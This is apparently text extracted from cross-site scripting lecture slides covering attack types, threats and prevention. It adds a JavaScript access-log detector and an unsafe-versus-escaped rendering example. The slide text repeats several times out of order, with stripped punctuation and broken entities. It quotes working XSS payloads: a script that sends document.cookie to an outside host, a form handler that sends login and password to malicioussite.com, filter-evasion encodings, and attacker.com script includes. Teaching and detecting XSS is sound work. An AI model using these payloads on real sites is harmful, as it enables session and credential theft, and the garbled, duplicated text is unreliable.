Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie
31
Disabling Scriptshellip
Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis
Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip
Prblms wid thishellip Substantial reduction in functionality and
responsiveness Many sites do not work without client-side
scripting forcing users to disable protection for that site and opening their systems to the threat
32
The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content
33
For explaining Purpose
Remember the syntaxhellip
34
SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt
35
Types of information leakage
Client can reveal cookies to a 3rd party (session state, order info, etc.):
http://host/a.php?variable="><script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?'%20+document.cookie</script>
Client can reveal posted form items to a 3rd party (userID/passwd, etc.):
<form> action="logoninformation.jsp" method="post" onsubmit="hackImg=new Image; hackImg.src='http://www.malicioussite.com/'+document.forms(1).login.value+':'+document.forms(1).password.value;" </form>
Client can be tricked into accessing/posting spoofed info to a trusted server:
www.trustedserver.com/xss.asp?name = <iframe src="http://www.trustedserver.com/auth_area/orderupdate?items=4000"></iframe>
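A log-side detector for the three leak cases above and the encoding tricks on the SYNTAX slide, as an added example that is not code from the original slides. It percent-decodes each request URI repeatedly (so double encoding such as %2563 for the letter c is unwrapped), lower-cases it and drops whitespace before matching, so "javasc ript:" and "do%63ument" are still caught. The access-log lines, hosts and signature labels are constructed for this example.

```javascript
// Added example (not from the original slides): scan web-server access-log
// lines for reflected-script and cookie-leak patterns after browser-style
// normalisation. Log lines and addresses below are constructed.

// Constructed access-log lines carrying the payloads quoted on the slides
// (slide 35 cookie theft and spoofed iframe, slide 34 "javasc<TAB>ript" and
// "do%63ument" encodings, the last one double-encoded), plus one benign line.
const SAMPLE_LOG = [
  '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /a.php?variable=%22%3E%3Cscript%3Edocument.location=%27http://www.cgisecurity.com/cgi-bin/cookie.cgi?%27%20+document.cookie%3C/script%3E HTTP/1.1" 200',
  '10.0.0.6 - - [01/Jan/2024:10:00:01 +0000] "GET /xss.asp?name=%3Ciframe%20src=%22http://www.trustedserver.com/auth_area/orderupdate?items=4000%22%3E%3C/iframe%3E HTTP/1.1" 200',
  '10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /profile?img=%3CIMG%20SRC=javasc%09ript:alert(test)%3E HTTP/1.1" 200',
  '10.0.0.8 - - [01/Jan/2024:10:00:03 +0000] "GET /search?q=do%2563ument.lo%2563ation HTTP/1.1" 200',
  '10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /search?q=cross+site+scripting HTTP/1.1" 200',
];

// Indicator labels (constructed) and the substrings that trigger them, matched
// against the normalised, whitespace-free, lower-cased URI.
const SIGNATURES = [
  ['script-tag',      '<script'],
  ['iframe-tag',      '<iframe'],
  ['script-scheme',   'javascript:'],
  ['script-scheme',   'vbscript:'],
  ['cookie-access',   'document.cookie'],
  ['location-change', 'document.location'],
];

// Decode like a browser/server would, repeatedly (bounded) so that double
// percent-encoding is unwrapped; stop on a malformed sequence rather than throw.
function normalise(uri) {
  let s = uri;
  for (let i = 0; i < 3; i++) {
    let decoded;
    try {
      decoded = decodeURIComponent(s.replace(/\+/g, ' '));
    } catch (e) {
      break;                       // malformed %-sequence: keep what we have
    }
    if (decoded === s) break;      // nothing left to decode
    s = decoded;
  }
  return s.toLowerCase();
}

// Return the distinct indicator labels found in one normalised URI.
// Whitespace is removed first so "javasc\tript:" matches "javascript:".
function detect(normalised) {
  const compact = normalised.replace(/\s+/g, '');
  const hits = new Set();
  for (const [label, needle] of SIGNATURES) {
    if (compact.includes(needle)) hits.add(label);
  }
  return [...hits];
}

// Pull the request URI out of each combined-format log line and report hits.
function scanLog(lines) {
  const findings = [];
  lines.forEach((line, index) => {
    const m = line.match(/"(?:GET|POST) (\S+) HTTP\//);
    if (!m) return;
    const indicators = detect(normalise(m[1]));
    if (indicators.length > 0) {
      findings.push({ line: index + 1, uri: m[1], indicators });
    }
  });
  return findings;
}

// Stand-alone run over the constructed log: lines 1-4 are flagged, line 5 is not.
for (const f of scanLog(SAMPLE_LOG)) {
  console.log(`line ${f.line}: ${f.indicators.join(', ')}`);
}
```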
36
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1. http://www.cgisecurity.com/archive/php/phpNuke_cross_site_scripting.txt
2. http://www.cgisecurity.com/archive/php/phpNuke_CSS_5_holes.txt
3. http://www.cgisecurity.com/archive/php/phpNuke_2_more_CSS_holes.txt
37
Related vulnerabilities
Several classes of vulnerabilities or attack techniques are related to XSS. Cross-zone scripting exploits zone concepts in certain browsers and usually executes code with greater privilege[31]. HTTP header injection can be used to create cross-site scripting conditions due to escaping problems at the HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32].
Cross-site request forgery (CSRF/XSRF) is almost the opposite of XSS: rather than exploiting the user's trust in a site, the attacker (and his malicious page) exploits the site's trust in the client software, submitting requests that the site believes represent conscious and intentional actions of authenticated users[33].
Lastly, SQL injection exploits a vulnerability in the database layer of an application. When user input is incorrectly filtered, arbitrary SQL statements can be executed by the application.
9
• XSS is an application-level attack which involves 3 parties
• We can load external script with a <script src=xxx> tag
• Script content can be loaded from anywhere (RPC/Remote scripting is common)
• Most attacks are only focused on collecting cookies
• Attacker does not know actual responses to client
• We can leak contents of pages, form values, results from submits and javascript vars as URL parameters with <image>, <script> and other tags that refer to the attacker's site
10
Types of XSS Attacks
11
Non-Persistent
• It is the most common type. These holes show up when data provided by a web client, most commonly in HTTP query parameters or in HTML form submissions, is used immediately by server-side scripts to generate a page of results for that user without properly sanitizing the response.
• Because HTML documents have a flat, serial structure that mixes control statements, formatting and the actual content, any non-validated user-supplied data included in the resulting page without proper HTML encoding may lead to markup injection.
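The non-persistent hole just described beside its fix from the Filtering section (escape per output context), as an added example that is not code from the original slides: renderUnsafe() copies a reflected query parameter straight into the page, renderSafe() escapes it with a different scheme for the HTML body, the URL attribute and the JavaScript string it lands in. The page template and the parameter name are constructed; the payload is the one quoted on the information-leakage slide.

```javascript
// Added example (not from the original slides): a reflected "name" parameter
// rendered into three output contexts, unescaped (the non-persistent XSS hole)
// and then escaped per context. Template and parameter name are constructed.

// HTML body / attribute context: numeric entity encoding of the characters
// that can open a tag, close an attribute value or start an entity.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, c => `&#${c.charCodeAt(0)};`);
}

// JavaScript string-literal context: everything outside [A-Za-z0-9] becomes a
// \xHH or \uHHHH escape, so the value can neither close the quoted string nor
// smuggle in "</script>" to end the enclosing script block.
function escapeJsString(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, c => {
    const code = c.charCodeAt(0);
    return code < 0x100
      ? `\\x${code.toString(16).padStart(2, '0')}`
      : `\\u${code.toString(16).padStart(4, '0')}`;
  });
}

// URL parameter context: percent-encoding, then HTML-escaping on top because
// the value still sits inside an href attribute (encodeURIComponent leaves ' alone).
function escapeUrlParam(s) {
  return escapeHtml(encodeURIComponent(String(s)));
}

// The hole: the parameter is echoed verbatim into all three contexts.
function renderUnsafe(name) {
  return `<p>Hello ${name}</p>` +
    `<a href="/profile?name=${name}">Profile</a>` +
    `<script>var who = '${name}';</script>`;
}

// The fix: one escaper per output context.
function renderSafe(name) {
  return `<p>Hello ${escapeHtml(name)}</p>` +
    `<a href="/profile?name=${escapeUrlParam(name)}">Profile</a>` +
    `<script>var who = '${escapeJsString(name)}';</script>`;
}

// How many <script opening tags does the page contain? The template itself
// contributes exactly one; anything beyond that came from the parameter.
function countScriptTags(html) {
  return (html.match(/<script/gi) || []).length;
}

// Cookie-theft payload quoted on the slides (reflected-parameter case).
const COOKIE_THEFT =
  `"><script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?'+document.cookie</script>`;

// Stand-alone check: the unsafe page carries 4 script tags, the safe page 1.
console.log('unsafe:', countScriptTags(renderUnsafe(COOKIE_THEFT)));
console.log('safe:  ', countScriptTags(renderSafe(COOKIE_THEFT)));
```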
12
Persistent…
The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw. It occurs when the data provided by the attacker is saved by the server and then permanently displayed on normal pages returned to other users in the course of regular browsing, without proper HTML escaping. A classic example of this is online message boards where users are allowed to post HTML-formatted messages for other users to read.
13
Examples of attacks…
14
Scripting Via Malicious Link…
15
In this scenario the attacker sends a specially crafted e-mail message to a victim containing a malicious link with scripting, like
<A HREF="http://legitimateSite.com/registration.cgi?clientprofile=<SCRIPT>malicious code</SCRIPT>">Click here</A>
When a user clicks on this link, the URL is sent to the legitimate site including the malicious code. If the legitimate server sends a page back to the user including the value of clientprofile, the malicious code will be executed on the client Web browser.
16
Stealing User's COOKIE…
17
If any part of the Web site uses cookies, then it may be possible to steal them from its users. In this scenario the attacker files a page with malicious script to the part of the site that is vulnerable. When the page is displayed, the malicious script runs, collects the user's cookies and sends a request to the attacker's Web site with the cookies gathered. Using this technique the attacker can gain sensitive data such as passwords, credit card numbers and any arbitrary information the user inputs.
18
Sending an Unauthorized Request
19
In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message. Because the malicious scripts are executed in a context that appears to have originated from the legitimate server, the attacker has full access to the document retrieved and may send data contained in the page back to their site. If the embedded script code has additional capability to interact with the legitimate server without alerting the victim, the attacker could develop and exploit that by posting data to a different page on the legitimate Web server.
20
By Scripting
21
Script can read all HTML content/tags in the other window.
Script can set/delete tags/content in the other window. We can read and set form values, then run a submit().
Script can set vars and call functions in the other window.
document.write can allow script to create new tags/content in the other window.
This means that a script can read all HTML contents of a document, change the appearance of the document, modify existing tags and values, and modify and submit forms. We have full control of the other window as long as it's in the same document.domain.
If we can forward cookies, then we can also forward other jscript-accessible content to an attacker. We can forward page contents, form values (including hidden…), jscript vars/state, jscript errors.
22
Some FACTS about the XSS attacks…
23
By SURVEY…
1st Gen XSS was against public sites and ran against everyone that visited the site.
2nd Gen XSS focused on sites that allow self-reflection XSS.
24
• Cross-site scripting attacks are a special case of code injection.
• Cross-site scripting carried out on websites was roughly 80% of all security vulnerabilities documented by Symantec as of 2007.
• Their impact may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data.
[Diagram: Dynamic XSS with 2-way comms. Victim Browser: XSS against site; an IFRAME in which script commands run and into which other documents on the site are loaded; <script src="attacker.com/innerHTML_of_IFRAME">. XSS Vulnerable Server. Attacker System: new jscript… <script src="attacker.com">]
26
Some prominent sites that have been affected in the past are…
The search engine Google, the email services of Google and Yahoo, and the social networking sites Facebook, MySpace and Orkut. The developers of MediaWiki have fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users.
Researchers have claimed that as many as 68% of websites are likely open to XSS attacks.
27
By seeing all this, the question that arises is…
Then how can we prevent it?
28
Yes, some methods are there for prevention, and those are:
>> Filtering
>> Cookie Security
>> Disabling Scripts
>> Encryption
29
Filtering
One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner
30
Cookie Security
Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie
31
Disabling Scriptshellip
Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis
Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip
Prblms wid thishellip Substantial reduction in functionality and
responsiveness Many sites do not work without client-side
scripting forcing users to disable protection for that site and opening their systems to the threat
32
The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content
33
For explaining Purpose
Remember the syntaxhellip
34
SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt
35
Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)
httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt
Client can reveal posted form items to 3rd party (userIDpasswd etc)
ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt
Client can be tricked into accessingposting spoofed info to trusted server
wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt
36
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt
2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt
3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt
37
Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]
Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]
Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application
5
It is a type of computer security vulnerability found in web applications which is done by injection or introduction of untrusted content into a dynamic web page about which neither the Web sites nor the client has enough information to
recognize ithellip amp this injected code is called XSS Holehellip
6
Causes
The DYNAMIC contenthelliphellip Its overview is attractive for the users but
like worms it is eating the user at the backhellip
Lack of CODE practicinghelliphellip This cause is based on the fact that the
developer who inserts the script has not a lot of experience and is in deficient to provide proper security
7
Threats helliphelliphelliphelliphellip
Taking over the user session before the users session cookie expires
Connect users to a malicious server of the attackers choice
Convince a user to access a URL supplied by the attacker could cause script or HTML of the attackers choice to be executed in the users browser Using this technique an attacker can take actions with the privileges of the user who accessed the URL such as issuing queries on the underlying SQL databases and viewing the results
(GMAIL example)
8
How it is performed
Cross-site scripting holes allow attackers to bypass client-side security mechanisms imposed on web content by modern browsers By finding ways of injecting malicious scripts into web pages an attacker can gain elevated access privileges to sensitive page content session cookies(information maintained by the browser on behalf of the user)
9
bullXSS is an application level attack whichinvolves 3 parties
bullWe can load external script with a ltscript src=xxxgt tag
bullScript content can be loaded from anywhere (RPCRemote scripting is common)
bullMost attacks are only focused on collecting cookies
bullAttacker does not know actual responses to client
bullWe can leak contents of pages form values results from submits and javascript vars as URL parameters with ltimagegt ltscriptgt and other tag refers to attacker site
10
Types of XSS Attacks
11
Non-Persistent
bull It is the most common type These holes show up when the data is provided by a web client most commonly in HTTP query parameters or in HTML form submissions is used immediately by server-side scripts to generate a page of results for that user without properly sanitizing the responsebull Because HTML documents have a flat serial structure that mixes control statements formatting and the actual content any non-validated user-supplied data included in the resulting page without proper HTML encoding may lead to markup injection
12
Persistenthellip
The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw it occurs when the data provided by the attacker is saved by the server and then permanently displayed on normal pages returned to other users in the course of regular browsing without proper HTML escaping A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read
13
Examples of attackshelliphelliphellip
14
Scripting Via Malicious Linkhellip
15
In this scenario the attacker sends a specially crafted e-mail message to a victim containing malicious link scripting likeltA HREF=httplegitimateSitecomregistrationcgiclientprofile=ltSCRIPTgtmalicious codeltSCRIPTgtgtClick hereltAgtWhen a user clicks on this link the URL is sent to site name including the malicious code If the legitimate server sends a page back to the user including the value of clientprofile the malicious code will be executed on the client Web browser
16
Stealing Userrsquos COOKIEhellip
17
If any part of the Web site uses cookies then it may be possible to steal them from its users In this scenario the attacker files a page with malicious script to the part of the site that is vulnerable When the page is displayed the malicious script runs collects the users cookies and sends a request to the attackers Web site with the cookies gathered Using this technique the attacker can gain sensitive data such as passwords credit card numbers and any arbitrary information the user inputs
18
Sending an Unauthorized Request
19
In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message Because the malicious scripts are executed in a context that appears to have originated from the legitimate server the attacker has full access to the document retrieved and may send data contained in the page back to their site If the embedded script code has additional interactions capability with the legitimate server without alerting the victim the attacker could develop and exploit that posted data to a different page on the legitimate Web server
20
By Scripting
21
Script can read all HTML contenttags in other window
Script can setdelete tagscontent in other window We can read and set form values then run a submit()
Script can set vars and call functions in other window
Documentwrite can allow script to create new tagscontent in other window
This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain
If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors
22
Some FACTS about the XSS attackshelliphelliphellip
23
By SURVEYhelliphelliphellip
1st Gen XSS was against public sites and ran against everyone that visited site
2nd Gen XSS focused on sites that allow self-reflection XSS
24
bull Cross-site scripting attacks are a special case of code injection
bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007
bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data
Dynamic XSS with 2way commsVictim Browser
XSS against site
IFRAME
Script commands run here
Other documents on site loaded into here
ltscript src=ldquoattackercominnnerHTML_of_IFRAMErdquogt
XSS Vulnerable Server
Attacker System
New jscripthellip
ltscript src=ldquoattackercomrdquogt
26
Some prominent sites that have been affected in the past arehelliphellip
The search engine Google The email services of Google and
Yahoo The social networking sites Facebook
MySpace and Orkut The developers of MediaWiki have
fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users
Researchers have claimed that as many as 68 of websites are likely open to XSS attacks
27
By seeing all this the question that arises ishelliphellip
Then how can we prevent it
28
Yes some methods are there for
prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption
29
Filtering
One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner
30
Cookie Security
Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie
31
Disabling Scriptshellip
Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis
Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip
Prblms wid thishellip Substantial reduction in functionality and
responsiveness Many sites do not work without client-side
scripting forcing users to disable protection for that site and opening their systems to the threat
32
The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content
33
For explaining Purpose
Remember the syntaxhellip
34
SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt
35
Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)
httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt
Client can reveal posted form items to 3rd party (userIDpasswd etc)
ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt
Client can be tricked into accessingposting spoofed info to trusted server
wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt
36
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt
2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt
3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt
37
Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]
Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]
Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application
6
Causes
The DYNAMIC contenthelliphellip Its overview is attractive for the users but
like worms it is eating the user at the backhellip
Lack of CODE practicinghelliphellip This cause is based on the fact that the
developer who inserts the script has not a lot of experience and is in deficient to provide proper security
7
Threats helliphelliphelliphelliphellip
Taking over the user session before the users session cookie expires
Connect users to a malicious server of the attackers choice
Convince a user to access a URL supplied by the attacker could cause script or HTML of the attackers choice to be executed in the users browser Using this technique an attacker can take actions with the privileges of the user who accessed the URL such as issuing queries on the underlying SQL databases and viewing the results
(GMAIL example)
8
How it is performed
Cross-site scripting holes allow attackers to bypass client-side security mechanisms imposed on web content by modern browsers By finding ways of injecting malicious scripts into web pages an attacker can gain elevated access privileges to sensitive page content session cookies(information maintained by the browser on behalf of the user)
9
bullXSS is an application level attack whichinvolves 3 parties
bullWe can load external script with a ltscript src=xxxgt tag
bullScript content can be loaded from anywhere (RPCRemote scripting is common)
bullMost attacks are only focused on collecting cookies
bullAttacker does not know actual responses to client
bullWe can leak contents of pages form values results from submits and javascript vars as URL parameters with ltimagegt ltscriptgt and other tag refers to attacker site
10
Types of XSS Attacks
11
Non-Persistent
bull It is the most common type These holes show up when the data is provided by a web client most commonly in HTTP query parameters or in HTML form submissions is used immediately by server-side scripts to generate a page of results for that user without properly sanitizing the responsebull Because HTML documents have a flat serial structure that mixes control statements formatting and the actual content any non-validated user-supplied data included in the resulting page without proper HTML encoding may lead to markup injection
12
Persistenthellip
The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw it occurs when the data provided by the attacker is saved by the server and then permanently displayed on normal pages returned to other users in the course of regular browsing without proper HTML escaping A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read
13
Examples of attackshelliphelliphellip
14
Scripting Via Malicious Linkhellip
15
In this scenario the attacker sends a specially crafted e-mail message to a victim containing malicious link scripting likeltA HREF=httplegitimateSitecomregistrationcgiclientprofile=ltSCRIPTgtmalicious codeltSCRIPTgtgtClick hereltAgtWhen a user clicks on this link the URL is sent to site name including the malicious code If the legitimate server sends a page back to the user including the value of clientprofile the malicious code will be executed on the client Web browser
16
Stealing Userrsquos COOKIEhellip
17
If any part of the Web site uses cookies then it may be possible to steal them from its users In this scenario the attacker files a page with malicious script to the part of the site that is vulnerable When the page is displayed the malicious script runs collects the users cookies and sends a request to the attackers Web site with the cookies gathered Using this technique the attacker can gain sensitive data such as passwords credit card numbers and any arbitrary information the user inputs
18
Sending an Unauthorized Request
19
In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message Because the malicious scripts are executed in a context that appears to have originated from the legitimate server the attacker has full access to the document retrieved and may send data contained in the page back to their site If the embedded script code has additional interactions capability with the legitimate server without alerting the victim the attacker could develop and exploit that posted data to a different page on the legitimate Web server
20
By Scripting
21
Script can read all HTML contenttags in other window
Script can setdelete tagscontent in other window We can read and set form values then run a submit()
Script can set vars and call functions in other window
Documentwrite can allow script to create new tagscontent in other window
This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain
If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors
22
Some FACTS about the XSS attackshelliphelliphellip
23
By SURVEYhelliphelliphellip
1st Gen XSS was against public sites and ran against everyone that visited site
2nd Gen XSS focused on sites that allow self-reflection XSS
24
bull Cross-site scripting attacks are a special case of code injection
bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007
bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data
Dynamic XSS with 2way commsVictim Browser
XSS against site
IFRAME
Script commands run here
Other documents on site loaded into here
ltscript src=ldquoattackercominnnerHTML_of_IFRAMErdquogt
XSS Vulnerable Server
Attacker System
New jscripthellip
ltscript src=ldquoattackercomrdquogt
26
Some prominent sites that have been affected in the past arehelliphellip
The search engine Google The email services of Google and
Yahoo The social networking sites Facebook
MySpace and Orkut The developers of MediaWiki have
fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users
Researchers have claimed that as many as 68 of websites are likely open to XSS attacks
27
By seeing all this the question that arises ishelliphellip
Then how can we prevent it
28
Yes some methods are there for
prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption
29
Filtering
One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner
30
Cookie Security
Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie
31
Disabling Scriptshellip
Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis
Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip
Prblms wid thishellip Substantial reduction in functionality and
responsiveness Many sites do not work without client-side
scripting forcing users to disable protection for that site and opening their systems to the threat
32
The easiest way to protect yourself as a user is to only follow links from the main website you wish to view, and to use its search engine to find the content.
33
For explanation purposes
Remember the syntax…
34
SYNTAX: script injection in an image src tag
• Embed nested quotes: ' or " or \u0022 \u0027
• Keyword filters that allow any js to execute are useless: A = 'navi'; B = 'gator.userAgent'; alert(eval(A+B))
• Limited input length + script block embed = unlimited script power (script src=)
• SSL pages warn if script src comes from an untrusted site, but if you can upload, say, an img that is actually js commands…
• Methods of script encoding:
  <img src="vbscript:do63ument.lo63ation=http://a.b.com">
  <IMG SRC="javascript:alert('test')">
  <IMG SRC="javasc ript:alert('test')">
35
Types of information leakage
Client can reveal cookies to 3rd party (session state, order info, etc.):
http://host/a.php?variable="><script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?'%20+document.cookie</script>
Client can reveal posted form items to 3rd party (userID/passwd etc.):
<form> action="logoninformation.jsp" method="post" onsubmit="hackImg=new Image; hackImg.src='http://www.malicioussite.com/'+document.forms(1).login.value+':'+document.forms(1).password.value;" </form>
Client can be tricked into accessing/posting spoofed info to trusted server:
www.trustedserver.com/xss.asp?name = <iframe src="http://www.trustedserver.com/auth_area/orderupdate?items=4000"></iframe>
36
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1. http://www.cgisecurity.com/archive/php/phpNuke_cross_site_scripting.txt
2. http://www.cgisecurity.com/archive/php/phpNuke_CSS_5_holes.txt
3. http://www.cgisecurity.com/archive/php/phpNuke_2_more_CSS_holes.txt
37
Related vulnerabilities
Several classes of vulnerabilities or attack techniques are related to XSS: cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31]; HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on the HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32].
Cross-site request forgery (CSRF/XSRF) is almost the opposite of XSS: rather than exploiting the user's trust in a site, the attacker (and his malicious page) exploits the site's trust in the client software, submitting requests that the site believes represent conscious and intentional actions of authenticated users[33].
Lastly, SQL injection exploits a vulnerability in the database layer of an application. When user input is incorrectly filtered, arbitrary SQL statements can be executed by the application.
9
• XSS is an application-level attack which involves 3 parties
• We can load external script with a <script src="xxx"> tag
• Script content can be loaded from anywhere (RPC/remote scripting is common)
• Most attacks are only focused on collecting cookies
• Attacker does not know actual responses to client
• We can leak contents of pages, form values, results from submits and JavaScript vars as URL parameters with <image>, <script> and other tags that refer to the attacker site
10
Types of XSS Attacks
11
Non-Persistent
